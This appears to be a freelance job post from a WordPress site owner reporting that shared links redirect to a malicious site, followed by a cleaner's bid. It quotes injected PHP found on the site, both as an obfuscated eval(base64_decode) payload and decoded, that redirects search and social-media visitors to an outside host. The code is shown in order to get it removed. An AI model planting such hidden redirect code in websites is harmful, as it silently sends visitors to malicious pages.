When I blog on my site [login to view URL] (or autopost via "Social Networks Auto Poster" widget) - it posts to my facebook. The shortened code (ex [login to view URL] ) leads to a malicious site I believe, ex [login to view URL] (oddly, on mobile devices, it correctly goes to my blog).
I am not sure if this is the cause, however a previous person I hired noticed some code that shouldn't be there (in his words). Code is below.
I would like to have the problem resolved, and also know how to prevent future such events from taking place? Below is what I've been told was found:
"I believe your website might have been hacked. There is this type of code (see below) in several of the php files, which is not normally in the wordpress php files… it’s been my experience that when there is something like this .. the website has been hacked. The best I could do is remove all this code, but without fixing the security hole(s) the hackers will likely just put this code back in there. I am just letting you know, so that you can address the issue before it gets worse.
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9xcnVlLnFwb2UuY29tLyIpOwpleGl0KCk7DQp9Cn0NCn0NCn0NCn0="));
com]
I base64_decoded that code it comes out to this (see below) but it basically looks like it might redirecting people to [login to view URL] (I didn’t go to this website because it is likely malicious) when they are referred to your website by search engines / facebook / myspace / etc.
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"[login to view URL]")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: [login to view URL]");
exit();
}
}
}
}
i am an experienced (mostly wordress) infection cleaner . i will clear your website from all malicious inserts and apply some patches i know to bugs that makes wordpress vulnerable to injection ( usually inside plugins ) . take my bid and consider it done . thank you , //liviu d